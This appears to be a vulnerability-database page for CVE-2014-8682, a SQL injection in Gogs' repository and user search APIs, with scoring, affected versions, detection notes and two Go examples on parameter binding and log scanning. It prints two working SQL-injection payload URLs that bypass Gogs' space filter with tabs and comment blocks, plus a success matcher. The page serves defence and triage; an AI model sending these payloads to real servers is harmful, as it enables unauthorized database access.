CVE-2014-8682
published 2014-11-21


Priority: P2 63 | Severity: high | CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public PoC available
EPSS: 34.27% (98.2th percentile)
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
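The description names the pattern (the q keyword ends up inside the SQL text in models/repo.go and models/user.go) and the notes below explain why the space-stripping FilterSQLInject did not help. The following Go program is an added example, not code from this page or from Gogs: it reconstructs the filter from the page's description (assumption: real Gogs code may differ), puts a string-concatenating query builder next to a parameter-binding one, and feeds both the repos/search PoC payload. Table and column names are hypothetical.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// filterSQLInject models the blacklist the notes describe: strip spaces, and
// on later 0.5.6 builds commas as well. Assumption: reconstructed from the
// page's description, not Gogs' own function.
func filterSQLInject(key string) string {
	key = strings.ReplaceAll(key, " ", "")
	key = strings.ReplaceAll(key, ",", "")
	return strings.TrimSpace(key)
}

// vulnerableRepoSearchSQL splices the filtered keyword straight into the
// statement, the pattern the advisory attributes to models/repo.go. Table and
// column names are hypothetical.
func vulnerableRepoSearchSQL(q string) string {
	kw := filterSQLInject(strings.ToLower(q))
	return "SELECT * FROM repository WHERE lower_name LIKE '%" + kw + "%' LIMIT 10"
}

// hardenedRepoSearchSQL returns fixed SQL text plus a bound argument. With a
// real driver the argument travels separately from the statement, so nothing
// in q is ever parsed as SQL and no character blacklist is needed.
func hardenedRepoSearchSQL(q string) (string, []interface{}) {
	return "SELECT * FROM repository WHERE lower_name LIKE ? LIMIT 10",
		[]interface{}{"%" + strings.ToLower(q) + "%"}
}

// Abbreviated form of the repos/search PoC payload shown on this page
// (constructed: the real PoC carries 22 JOINed subselects).
const tabPayload = "%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09where%09(%27%25%27=%27"

// The same payload written with ordinary spaces, to show what the filter stops.
const spacePayload = "') UNION SELECT * FROM (SELECT null) AS a1 where ('%'='"

// decodeQ percent-decodes a raw q value the way the HTTP layer would (%09 -> tab).
func decodeQ(raw string) (string, error) {
	return url.QueryUnescape(raw)
}

func main() {
	q, err := decodeQ(tabPayload)
	if err != nil {
		panic(err)
	}
	// Spaces are stripped: keywords fuse into one token and the query is merely broken.
	fmt.Println("space payload, vulnerable:", vulnerableRepoSearchSQL(spacePayload))
	// Tabs survive: a complete UNION SELECT is spliced into the statement.
	fmt.Println("tab payload, vulnerable:  ", vulnerableRepoSearchSQL(q))
	// The hardened form's SQL text is identical whatever q contains.
	sql, args := hardenedRepoSearchSQL(q)
	fmt.Println("tab payload, hardened:    ", sql, args)
}
```

The point the notes make about commas follows the same logic: removing one more character only forces the attacker onto JOIN-based column lists, as the repos/search PoC shows. Binding the parameter removes the whole class of bypass.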

Affected (7 ranges)

Vendor    Product   Version range            Fixed in
gogits    gogs      <= 0.5.5                 (none listed)
gogits    gogs      (5 further entries with no version range recorded)
gogs.io   gogs      >= 0.3.1, < 0.5.8        0.5.8

The sources do not agree on the fix version: the description and the notes below cite 0.5.6.1105 Beta, while the gogs.io entry lists 0.5.8. For triage, treat any Gogs build below 0.5.8 as in scope and confirm the installed version directly.

Detection & IOCs (extracted from sources)

url: /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
url: /api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.db/**/where/**/('%25'%3D'
path: /api/v1/repos/search
path: /api/v1/users/search
  • Successful exploitation of the /api/v1/repos/search endpoint returns HTTP 200 with a JSON body that contains all three strings '"ok":true', '"data"' and '"repolink":"' at once; that combination is the matcher a template or scanner check can key on.
  • The repos/search payload uses tab characters (0x09, %09) in place of spaces (0x20) because the FilterSQLInject function strips spaces but not tabs. Detection rules should URL-decode q and look for tab-delimited UNION SELECT patterns, not only space-delimited ones.
  • The /api/v1/users/search PoC uses /**/ comment blocks as the whitespace substitute to bypass the same space filter; monitor for comment-delimited UNION SELECT patterns in requests to this endpoint.
  • The injection is exploitable only on Gogs versions from v0.3.1-9-g49dc57e through 0.5.x before 0.5.6.1105 Beta; from 0.5.6.1105 onward the search queries use prepared statements and are not vulnerable.
  • Starting with v0.5.6.1025-g83283b, FilterSQLInject also strips commas in addition to spaces, so on those builds an attacker must use JOIN-based UNION payloads (as in the repos/search PoC above) instead of comma-separated column lists.
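The two detection notes above come down to one rule: decode q, collapse every whitespace substitute (tabs, /**/ comments, runs of spaces) to a single space, then match UNION SELECT on the two search endpoints. The Go program below is an added example, not a Nuclei template, a Gogs component or anything from this page's sources. It runs that rule over a few constructed request lines (abbreviated versions of the two PoC payloads plus two benign searches) and shows, via naiveMatch, that a space-only rule on the raw query misses both PoCs.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Endpoints named in the advisory; q on each is the injection point.
var targetPaths = map[string]bool{
	"/api/v1/repos/search": true,
	"/api/v1/users/search": true,
}

var (
	// /**/ comment blocks used as whitespace substitutes (users/search PoC).
	commentRe = regexp.MustCompile(`/\*.*?\*/`)
	// Tabs (repos/search PoC), newlines and runs of spaces collapse to one space.
	wsRe = regexp.MustCompile(`\s+`)
	// UNION [ALL] SELECT after normalization; \b keeps "unionsquare" from matching.
	unionSelectRe = regexp.MustCompile(`(?i)\bunion\b(?:\s+all)?\s+select\b`)
)

// Constructed sample request lines (not real traffic). Lines 2 and 3 carry
// abbreviated forms of the two PoC payloads shown above; lines 1 and 4 are
// benign searches that a careless rule might flag.
var sampleRequests = []string{
	"GET /api/v1/repos/search?q=gogs&limit=10",
	"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09where%09(%27%25%27=%27",
	"GET /api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,@@version/**/from/**/mysql.db/**/where/**/('%25'%3D'",
	"GET /api/v1/users/search?q=unionsquare",
}

// Finding is one flagged request.
type Finding struct {
	Path       string
	Normalized string // q after decoding and whitespace normalization
}

// normalizeQ undoes the two whitespace-substitution tricks the PoCs rely on.
// Percent-decoding (%09 -> tab) has already been done by net/url.
func normalizeQ(q string) string {
	q = commentRe.ReplaceAllString(q, " ")
	q = wsRe.ReplaceAllString(q, " ")
	return strings.ToLower(strings.TrimSpace(q))
}

// naiveMatch is a space-only rule applied to the raw request line; it is here
// to show that it misses both PoCs.
func naiveMatch(rawLine string) bool {
	return strings.Contains(strings.ToLower(rawLine), "union select")
}

// scanRequest parses one "METHOD /path?query" line and returns a Finding when
// q on a target endpoint contains UNION SELECT after normalization.
func scanRequest(line string) (*Finding, error) {
	fields := strings.Fields(line)
	if len(fields) < 2 {
		return nil, fmt.Errorf("malformed request line: %q", line)
	}
	u, err := url.ParseRequestURI(fields[1])
	if err != nil {
		return nil, err
	}
	if !targetPaths[u.Path] {
		return nil, nil
	}
	values, err := url.ParseQuery(u.RawQuery)
	if err != nil {
		return nil, err
	}
	norm := normalizeQ(values.Get("q"))
	if !unionSelectRe.MatchString(norm) {
		return nil, nil
	}
	return &Finding{Path: u.Path, Normalized: norm}, nil
}

// scanAll runs scanRequest over every line, in order.
func scanAll(lines []string) ([]Finding, error) {
	var out []Finding
	for _, l := range lines {
		f, err := scanRequest(l)
		if err != nil {
			return nil, err
		}
		if f != nil {
			out = append(out, *f)
		}
	}
	return out, nil
}

func main() {
	findings, err := scanAll(sampleRequests)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("SQLi on %s: %s\n", f.Path, f.Normalized)
	}
	for i, l := range sampleRequests {
		fmt.Printf("naive space-only rule flags line %d: %v\n", i+1, naiveMatch(l))
	}
}
```

Scoping the match to the two endpoints and to the q parameter keeps the rule narrow enough for production logs; the normalization step is the part that generalizes, since any blacklist bypass that swaps one whitespace form for another collapses back to the same token stream.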